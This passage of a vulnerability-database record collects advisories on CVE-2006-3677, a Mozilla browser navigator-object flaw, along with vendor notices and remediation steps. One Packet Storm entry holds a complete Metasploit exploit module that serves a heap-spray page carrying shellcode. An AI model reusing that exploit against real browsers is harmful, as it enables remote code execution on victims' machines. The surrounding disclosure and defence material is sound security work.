result:\r\nPoC link of Browser Fun Blog causes Netscape and K-Meleon switch to Not Responding state. All information at other tabs (layers) was lost and browser sessions must kill with Windows Task Manager. CPU usage raised remarkably and all RAM available was used, Task Manager reported only 300 kilobytes free memory of 384 Mb.\r\n\r\nAffected versions:\r\nVulnerability has been confirmed in Netscape Browser 8.1, K-Meleon 1.0 and Flock 0.7.3.2 in Windows 2000 SP4 fully patched.\r\n\r\nSolution status:\r\nNo updated versions available from the vendor at the time of reporting.\r\n\r\nVendor status:\r\nK-Meleon developers was contacted on 30th July 2006.\r\n\r\nExploitation requires that Java plug-in is in use. Java Environment 1.5.0_06 (1.5.0_06-b05) from Sun Microsystems Inc. was used in test machine.\r\n\r\nReferences:\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677\r\n\r\nCredit:\r\nThis vulnerability was reported earlier in Firefox and SeaMonkey by anonymous person via Zero Day Initiative program.\r\nJuha-Matti Laurio confirmed this vulnerability in Netscape Browser, K-Meleon and Flock.\r\n\r\nTimeline:\r\n28-Jul-2006 - Vulnerability confirmed in Netscape\r\n29-Jul-2006 - Vulnerability confirmed in K-Meleon and Flock\r\n30-Jul-2006 - Vendor was contacted (K-Meleon developers)\r\n30-Jul-2006 - Security companies and several CERT units contacted\r\n\r\n\r\nBest regards,\r\nJuha-Matti Laurio\r\nNetworksecurity.fi\r\nhttp://www.networksecurity.fi/", "edition": 1, "modified": "2006-08-02T00:00:00", "published": "2006-08-02T00:00:00", "id": "SECURITYVULNS:DOC:13682", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13682", "title": "Netscape/K-Meleon/Flock JavaScript navigator Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3806", "CVE-2006-3081", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3801", "CVE-2006-3113", "CVE-2006-3805"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA06-208A\r\n\r\n\r\nMozilla Products Contain Multiple Vulnerabilities\r\n\r\n Original release date: July 27, 2006\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Mozilla SeaMonkey\r\n * Mozilla Firefox\r\n * Mozilla Thunderbird\r\n\r\n Any products based on Mozilla components, specifically Gecko, may also\r\n be affected.\r\n\r\n\r\nOverview\r\n\r\n The Mozilla web browser and derived products contain several\r\n vulnerabilities, the most serious of which could allow a remote\r\n attacker to execute arbitrary code on an affected system.\r\n\r\n\r\nI. Description\r\n\r\n Several vulnerabilities have been reported in the Mozilla web browser\r\n and derived products. More detailed information is available in the\r\n individual vulnerability notes, including the following:\r\n\r\n\r\n VU#476724 - Mozilla products fail to properly handle frame references \r\n\r\n Mozilla products fail to properly handle frame or window references.\r\n This may allow a remote attacker to execute arbitrary code on a\r\n vulnerable system.\r\n (CVE-2006-3801)\r\n\r\n\r\n VU#670060 - Mozilla fails to properly release JavaScript references \r\n\r\n Mozilla products fail to properly release memory. This vulnerability\r\n may allow a remote attacker to execute code on a vulnerable system.\r\n (CVE-2006-3677)\r\n\r\n\r\n VU#239124 - Mozilla fails to properly handle simultaneous XPCOM events\r\n \r\n Mozilla products are vulnerable to memory corruption via simultaneous\r\n XPCOM events. This may allow a remote attacker to execute arbitrary\r\n code on a vulnerable system.\r\n (CVE-2006-3113)\r\n\r\n\r\n VU#265964 - Mozilla products contain a race condition \r\n\r\n Mozilla products contain a race condition. This vulnerability may\r\n allow a remote attacker to execute code on a vulnerable system.\r\n (CVE-2006-3803)\r\n\r\n\r\n VU#897540 - Mozilla products VCard attachment buffer overflow \r\n\r\n Mozilla products fail to properly handle malformed VCard attachments,\r\n allowing a buffer overflow to occur. This vulnerability may allow a\r\n remote attacker to execute arbitrary code on a vulnerable system.\r\n (CVE-2006-3804)\r\n\r\n\r\n VU#876420 - Mozilla fails to properly handle garbage collection \r\n\r\n The Mozilla JavaScript engine fails to properly perform garbage\r\n collection, which may allow a remote attacker to execute arbitrary\r\n code on a vulnerable system.\r\n (CVE-2006-3805)\r\n\r\n\r\n VU#655892 - Mozilla JavaScript engine contains multiple integer\r\n overflows \r\n\r\n The Mozilla JavaScript engine contains multiple integer overflows.\r\n This vulnerability may allow a remote attacker to execute arbitrary\r\n code on a vulnerable system.\r\n (CVE-2006-3806)\r\n\r\n\r\n VU#687396 - Mozilla products fail to properly validate JavaScript\r\n constructors \r\n\r\n Mozilla products fail to properly validate references returned by\r\n JavaScript constructors. This vulnerability may allow a remote\r\n attacker to execute arbitrary code on a vulnerable system.\r\n (CVE-2006-3807)\r\n\r\n\r\n VU#527676 - Mozilla contains multiple memory corruption\r\n vulnerabilities \r\n\r\n Mozilla products contain multiple vulnerabilities that can cause\r\n memory corruption. This may allow a remote attacker to execute\r\n arbitrary code on a vulnerable system.\r\n (CVE-2006-3811)\r\n\r\n\r\nII. Impact\r\n\r\n A remote, unauthenticated attacker could execute arbitrary code on a\r\n vulnerable system. An attacker may also be able to cause the\r\n vulnerable application to crash.\r\n\r\n\r\nIII. Solution\r\n\r\nUpgrade\r\n\r\n Upgrade to Mozilla Firefox 1.5.0.5, Mozilla Thunderbird 1.5.0.5, or\r\n SeaMonkey 1.0.3.\r\n\r\nDisable JavaScript and Java\r\n\r\n These vulnerabilities can be mitigated by disabling JavaScript and\r\n Java in all affected products. Instructions for disabling Java in\r\n Firefox can be found in the "Securing Your Web Browser" document.\r\n\r\n\r\nAppendix A. References\r\n\r\n * US-CERT Vulnerability Notes Related to July Mozilla Security\r\n Advisories -\r\n <http://www.kb.cert.org/vuls/byid?searchview&query=firefox_1505>\r\n\r\n * CVE-2006-3081 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3801>\r\n\r\n * CVE-2006-3677 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677>\r\n\r\n * CVE-2006-3113 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3113>\r\n\r\n * CVE-2006-3803 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3803>\r\n\r\n * CVE-2006-3804 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3804>\r\n\r\n * CVE-2006-3805 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3805>\r\n\r\n * CVE-2006-3806 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3806>\r\n\r\n * CVE-2006-3807 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3807>\r\n\r\n * CVE-2006-3811 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3811>\r\n\r\n * Mozilla Foundation Security Advisories -\r\n <http://www.mozilla.org/security/announce/>\r\n\r\n * Known Vulnerabilities in Mozilla Products -\r\n <http://www.mozilla.org/projects/security/known-vulnerabilities.html>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/browser_security.html#Mozilla_Firefox>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA06-208A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA06-208A Feedback VU#239124" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2006 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n Jul 27, 2006: Initial release\r\n\r\n\r\n \r\n \r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRMkgNexOF3G+ig+rAQIFsAgAoWoMkxxhkzb+xgLVCJF7h4k4EBCgJGWa\r\nBSOiFfL4Gs4vv4lNooDRCIOdxiBfXYL71XsIOT4aWry5852/6kyYnyAiXXYj1Uv0\r\nSbPY2sQSZ5EaG+G9i8HDIy3fpJN4XgH3ng1uzUnJihY19IfndbXicpZE+debIUri\r\nqt9NRD2f5FW5feKo1cBpYxtmxQAEePOa2dJHh7I7cnFGtG3MixHx4kVEyuYUutCX\r\n5tHDsfTIdySNkIdCQ4vhk846bErB/kaHiKMQDfMglllb3GOSc07OQ0CDo2eTPVsA\r\n9DtKkiDP1C4dh1mxco8CWlS6327+EB0KXGGoqDF2+j/rrpsW0oc8nA==\r\n=HwuK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13656", "title": "US-CERT Technical Cyber Security Alert TA06-208A -- Mozilla Products Contain Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2020-06-22T11:39:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-3677"], "edition": 3, "description": "This vulnerability allows attackers to execute arbitrary code on vulnerable installations of the Mozilla Firefox web browser. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The flaw exists when assigning specific values to the window.navigator object. A lack of checking on assignment causes user supplied data to be later used in the creation of other objects leading to eventual code execution.", "modified": "2006-06-22T00:00:00", "published": "2006-07-26T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-025/", "id": "ZDI-06-025", "title": "Mozilla Firefox Javascript navigator Object Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-3677"], "edition": 1, "description": "## Solution Description\nUpgrade Firefox to version 1.5.0.5 or Seamonkey to version 1.0.3, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.caminobrowser.org/releases/1.0.2.php\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-536)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-354-1)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:143)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-327-1)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-02.xml)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Aug/0007.html)\n[Vendor Specific Advisory URL](http://www.mozilla.org/security/announce/2006/mfsa2006-45.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-03.xml)\nSecurity Tracker: 1016586\nSecurity Tracker: 1016587\n[Secunia Advisory ID:21361](https://secuniaresearch.flexerasoftware.com/advisories/21361/)\n[Secunia Advisory ID:22066](https://secuniaresearch.flexerasoftware.com/advisories/22066/)\n[Secunia Advisory ID:22210](https://secuniaresearch.flexerasoftware.com/advisories/22210/)\n[Secunia Advisory ID:21228](https://secuniaresearch.flexerasoftware.com/advisories/21228/)\n[Secunia Advisory ID:21532](https://secuniaresearch.flexerasoftware.com/advisories/21532/)\n[Secunia Advisory ID:22065](https://secuniaresearch.flexerasoftware.com/advisories/22065/)\n[Secunia Advisory ID:21343](https://secuniaresearch.flexerasoftware.com/advisories/21343/)\n[Secunia Advisory ID:21262](https://secuniaresearch.flexerasoftware.com/advisories/21262/)\n[Secunia Advisory ID:19873](https://secuniaresearch.flexerasoftware.com/advisories/19873/)\n[Secunia Advisory ID:21229](https://secuniaresearch.flexerasoftware.com/advisories/21229/)\n[Secunia Advisory ID:21216](https://secuniaresearch.flexerasoftware.com/advisories/21216/)\n[Secunia Advisory ID:21246](https://secuniaresearch.flexerasoftware.com/advisories/21246/)\n[Secunia Advisory ID:21243](https://secuniaresearch.flexerasoftware.com/advisories/21243/)\n[Secunia Advisory ID:21269](https://secuniaresearch.flexerasoftware.com/advisories/21269/)\n[Secunia Advisory ID:21270](https://secuniaresearch.flexerasoftware.com/advisories/21270/)\n[Secunia Advisory ID:21336](https://secuniaresearch.flexerasoftware.com/advisories/21336/)\n[Secunia Advisory ID:21529](https://secuniaresearch.flexerasoftware.com/advisories/21529/)\n[Secunia Advisory ID:21631](https://secuniaresearch.flexerasoftware.com/advisories/21631/)\n[Related OSVDB ID: 27558](https://vulners.com/osvdb/OSVDB:27558)\n[Related OSVDB ID: 27560](https://vulners.com/osvdb/OSVDB:27560)\n[Related OSVDB ID: 27564](https://vulners.com/osvdb/OSVDB:27564)\n[Related OSVDB ID: 27565](https://vulners.com/osvdb/OSVDB:27565)\n[Related OSVDB ID: 27567](https://vulners.com/osvdb/OSVDB:27567)\n[Related OSVDB ID: 27566](https://vulners.com/osvdb/OSVDB:27566)\n[Related OSVDB ID: 27568](https://vulners.com/osvdb/OSVDB:27568)\n[Related OSVDB ID: 27572](https://vulners.com/osvdb/OSVDB:27572)\n[Related OSVDB ID: 27561](https://vulners.com/osvdb/OSVDB:27561)\n[Related OSVDB ID: 27562](https://vulners.com/osvdb/OSVDB:27562)\n[Related OSVDB ID: 27569](https://vulners.com/osvdb/OSVDB:27569)\nRedHat RHSA: RHSA-2006:0608\nRedHat RHSA: RHSA-2006:0609\nRedHat RHSA: RHSA-2006:0611\nRedHat RHSA: RHSA-2006:0610\nRedHat RHSA: RHSA-2006:0594\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-025.html\nOther Advisory URL: http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html\nNews Article: http://news.com.com/Firefox+update+plugs+critical+holes/2100-1002_3-6099254.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0696.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0492.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0682.html\nKeyword: MoBB #28\nGeneric Exploit URL: http://metasploit.com/users/hdm/tools/browserfun/mobb_028.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/5LP090KJFW.html\nFrSIRT Advisory: ADV-2006-2998\n[CVE-2006-3677](https://vulners.com/cve/CVE-2006-3677)\nCERT VU: 670060\nBugtraq ID: 19181\nBugtraq ID: 19192\n", "modified": "2006-07-25T05:04:14", "published": "2006-07-25T05:04:14", "href": "https://vulners.com/osvdb/OSVDB:27559", "id": "OSVDB:27559", "title": "Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:34", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Mozilla Suite/Firefox Navigator Object Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82262", "href": "https://packetstormsecurity.com/files/82262/Mozilla-Suite-Firefox-Navigator-Object-Code-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core/constants' \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:ua_name => HttpClients::FF, \n:javascript => true, \n:rank => NormalRanking, # reliable memory corruption \n:vuln_test => %Q| \nis_vuln = false; \nif (window.navigator.javaEnabled && window.navigator.javaEnabled()){ \nis_vuln = true; \n} \n|, \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution', \n'Description' => %q{ \nThis module exploits a code execution vulnerability in the Mozilla \nSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit \nrequires the Java plugin to be installed. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => ['hdm'], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3677'], \n['OSVDB', '27559'], \n['BID', '19192'], \n['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'], \n['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'], \n], \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\", \n}, \n'Targets' => \n[ \n[ 'Firefox 1.5.0.4 Windows x86', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Ret' => 0x08000800, \n'Fill' => \"%u0800\", \n} \n], \n[ 'Firefox 1.5.0.4 Linux x86', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Ret' => -0x58000000, \n'Fill' => \"%ua8a8\", \n} \n], \n[ 'Firefox 1.5.0.4 Mac OS X PPC', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_PPC, \n'Ret' => 0x0c000000, \n'Fill' => \"%u0c0c\", \n} \n], \n[ 'Firefox 1.5.0.4 Mac OS X x86', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n'Ret' => 0x1c000000, \n'Fill' => \"%u1c1c\", \n} \n], \n], \n'DisclosureDate' => 'Jul 25 2006' \n)) \nend \n \ndef on_request_uri(cli, request) \n \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) \n \n# Handle the payload \nhandler(cli) \nend \n \ndef generate_html(payload) \n \nenc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \nreturn %Q| \n<html><head> \n<script> \nfunction Exploit() { \nif (window.navigator.javaEnabled) { \nvar shellcode = unescape(\"#{enc_code}\"); \nvar b = unescape(\"#{target['Fill']}\"); \nwhile (b.length <= 0x400000) b+=b; \n \nvar c = new Array(); \nfor (var i =0; i<36; i++) { \nc[i] = \nb.substring(0, 0x100000 - shellcode.length) + shellcode + \nb.substring(0, 0x100000 - shellcode.length) + shellcode + \nb.substring(0, 0x100000 - shellcode.length) + shellcode + \nb.substring(0, 0x100000 - shellcode.length) + shellcode; \n} \n \nwindow.navigator = (#{target['Ret']} / 2); \ntry { \njava.lang.reflect.Runtime.newInstance( \njava.lang.Class.forName(\"java.lang.Runtime\"), 0 \n); \n}catch(e){ \n \n} \n} \n} \n</script> \n</head><body onload='Exploit()'>Please wait...</body></html> \n| \nend \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82262/mozilla_navigatorjava.rb.txt"}], "cert": [{"lastseen": "2020-09-18T20:43:09", "bulletinFamily": "info", "cvelist": ["CVE-2006-3677"], "description": "### Overview \n\nMozilla products fail to properly release memory. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMozilla products fail to properly release JavaScript references. This may corrupt memory in a way that can allow an attacker to execute arbitrary code.\n\nFor complete list of affected products refer to Mozilla Foundation Security Advisory [2006-44](<http://www.mozilla.org/security/announce/2006/mfsa2006-44.html>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. The attacker could also cause the vulnerable application to crash. \n \n--- \n \n### Solution \n\n**Upgrade** \nThis vulnerability has been addressed in [Firefox 1.5.0.5](<http://www.mozilla.com/firefox/>) and [SeaMonkey 1.0.3](<http://www.mozilla.org/projects/seamonkey/>) according to the Mozilla Foundation Security Update [2006-44](<http://www.mozilla.org/security/announce/2006/mfsa2006-44.html>). \n \n--- \n \nUntil it is possible to upgrade to a fixed version of Firefox or SeaMonkey, the following workaround will prevent exploitation:\n\n \n**Disable JavaScript** \n \nFor instructions on how to disable JavaScript in Firefox, please refer to the Firefox section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Mozilla_Firefox>) document. \n \n--- \n \n### Vendor Information\n\n670060\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Mozilla, Inc. __ Affected\n\nUpdated: July 27, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.mozilla.org/security/announce/2006/mfsa2006-44.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23670060 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.mozilla.org/security/announce/2006/mfsa2006-44.html>\n * <https://bugzilla.mozilla.org/show_bug.cgi?id=342267>\n * <http://secunia.com/advisories/19873/>\n * <http://secunia.com/advisories/21216/>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-025.html>\n * <http://www.securityfocus.com/bid/19181>\n\n### Acknowledgements\n\nThis vulnerability was reported in Mozilla Foundation Security Advisory 2006-44. Mozilla credits Thilo Girmann with reporting this vulnerability.\n\nThis document was written by Jeff Gennari based on information from Mozilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3677](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3677>) \n---|--- \n**Severity Metric:** | 58.14 \n**Date Public:** | 2006-07-25 \n**Date First Published:** | 2006-07-27 \n**Date Last Updated: ** | 2007-02-09 14:05 UTC \n**Document Revision: ** | 27 \n", "modified": "2007-02-09T14:05:00", "published": "2006-07-27T00:00:00", "id": "VU:670060", "href": "https://www.kb.cert.org/vuls/id/670060", "type": "cert", "title": "Mozilla fails to properly release JavaScript references", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:44", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "Various flaws have been reported that allow an attacker to execute \narbitrary code with user privileges by tricking the user into opening \na malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, \nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, \nCVE-2006-3809, CVE-2006-3811, CVE-2006-3812)\n\ncross-site scripting vulnerabilities were found in the \nXPCNativeWrapper() function and native DOM method handlers. A \nmalicious web site could exploit these to modify the contents or steal \nconfidential data (such as passwords) from other opened web pages. \n(CVE-2006-3802, CVE-2006-3810)\n\nA bug was found in the script handler for automatic proxy \nconfiguration. A malicious proxy could send scripts which could \nexecute arbitrary code with the user's privileges. (CVE-2006-3808)\n\nPlease see\n\n<http://www.mozilla.org/projects/security/known-vulnerabilities.html#Firefox>\n\nfor technical details of these vulnerabilities.", "edition": 6, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "USN-327-1", "href": "https://ubuntu.com/security/notices/USN-327-1", "title": "firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "edition": 1, "description": "### Background\n\nMozilla Firefox is a redesign of the Mozilla Navigator component. The goal is to produce a cross-platform stand-alone browser application. \n\n### Description\n\nThe following vulnerabilities have been reported: \n\n * Benjamin Smedberg discovered that chrome URL's could be made to reference remote files.\n * Developers in the Mozilla community looked for and fixed several crash bugs to improve the stability of Mozilla clients.\n * \"shutdown\" reports that cross-site scripting (XSS) attacks could be performed using the construct XPCNativeWrapper(window).Function(...), which created a function that appeared to belong to the window in question even after it had been navigated to the target site.\n * \"shutdown\" reports that scripts granting the UniversalBrowserRead privilege can leverage that into the equivalent of the far more powerful UniversalXPConnect since they are allowed to \"read\" into a privileged context.\n * \"moz_bug_r_a4\" reports that A malicious Proxy AutoConfig (PAC) server could serve a PAC script that can execute code with elevated privileges by setting the required FindProxyForURL function to the eval method on a privileged object that leaked into the PAC sandbox.\n * \"moz_bug_r_a4\" discovered that Named JavaScript functions have a parent object created using the standard Object() constructor (ECMA-specified behavior) and that this constructor can be redefined by script (also ECMA-specified behavior).\n * Igor Bukanov and shutdown found additional places where an untimely garbage collection could delete a temporary object that was in active use.\n * Georgi Guninski found potential integer overflow issues with long strings in the toSource() methods of the Object, Array and String objects as well as string function arguments.\n * H. D. Moore reported a testcase that was able to trigger a race condition where JavaScript garbage collection deleted a temporary variable still being used in the creation of a new Function object.\n * A malicious page can hijack native DOM methods on a document object in another domain, which will run the attacker's script when called by the victim page.\n * Secunia Research has discovered a vulnerability which is caused due to an memory corruption error within the handling of simultaneously happening XPCOM events. This leads to use of a deleted timer object.\n * An anonymous researcher for TippingPoint and the Zero Day Initiative showed that when used in a web page Java would reference properties of the window.navigator object as it started up.\n * Thilo Girmann discovered that in certain circumstances a JavaScript reference to a frame or window was not properly cleared when the referenced content went away.\n\n### Impact\n\nA user can be enticed to open specially crafted URLs, visit webpages containing malicious JavaScript or execute a specially crafted script. These events could lead to the execution of arbitrary code, or the installation of malware on the user's computer. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/mozilla-firefox-1.5.0.5\"\n\nUsers of the binary package should upgrade as well: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/mozilla-firefox-bin-1.5.0.5\"", "modified": "2006-08-03T00:00:00", "published": "2006-08-03T00:00:00", "id": "GLSA-200608-03", "href": "https://security.gentoo.org/glsa/200608-03", "type": "gentoo", "title": "Mozilla Firefox: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "### Background\n\nThe Mozilla SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as \"Mozilla Application Suite\". \n\n### Description\n\nThe following vulnerabilities have been reported: \n\n * Benjamin Smedberg discovered that chrome URL's could be made to reference remote files.\n * Developers in the Mozilla community looked for and fixed several crash bugs to improve the stability of Mozilla clients, which could lead to the execution of arbitrary code by a remote attacker.\n * \"shutdown\" reports that cross-site scripting (XSS) attacks could be performed using the construct XPCNativeWrapper(window).Function(...), which created a function that appeared to belong to the window in question even after it had been navigated to the target site.\n * \"shutdown\" reports that scripts granting the UniversalBrowserRead privilege can leverage that into the equivalent of the far more powerful UniversalXPConnect since they are allowed to \"read\" into a privileged context.\n * \"moz_bug_r_a4\" reports that A malicious Proxy AutoConfig (PAC) server could serve a PAC script that can execute code with elevated privileges by setting the required FindProxyForURL function to the eval method on a privileged object that leaked into the PAC sandbox.\n * \"moz_bug_r_a4\" discovered that Named JavaScript functions have a parent object created using the standard Object() constructor (ECMA-specified behavior) and that this constructor can be redefined by script (also ECMA-specified behavior).\n * Igor Bukanov and shutdown found additional places where an untimely garbage collection could delete a temporary object that was in active use.\n * Georgi Guninski found potential integer overflow issues with long strings in the toSource() methods of the Object, Array and String objects as well as string function arguments.\n * H. D. Moore reported a testcase that was able to trigger a race condition where JavaScript garbage collection deleted a temporary variable still being used in the creation of a new Function object.\n * A malicious page can hijack native DOM methods on a document object in another domain, which will run the attacker's script when called by the victim page.\n * Secunia Research has discovered a vulnerability which is caused due to an memory corruption error within the handling of simultaneously happening XPCOM events. This leads to use of a deleted timer object.\n * An anonymous researcher for TippingPoint and the 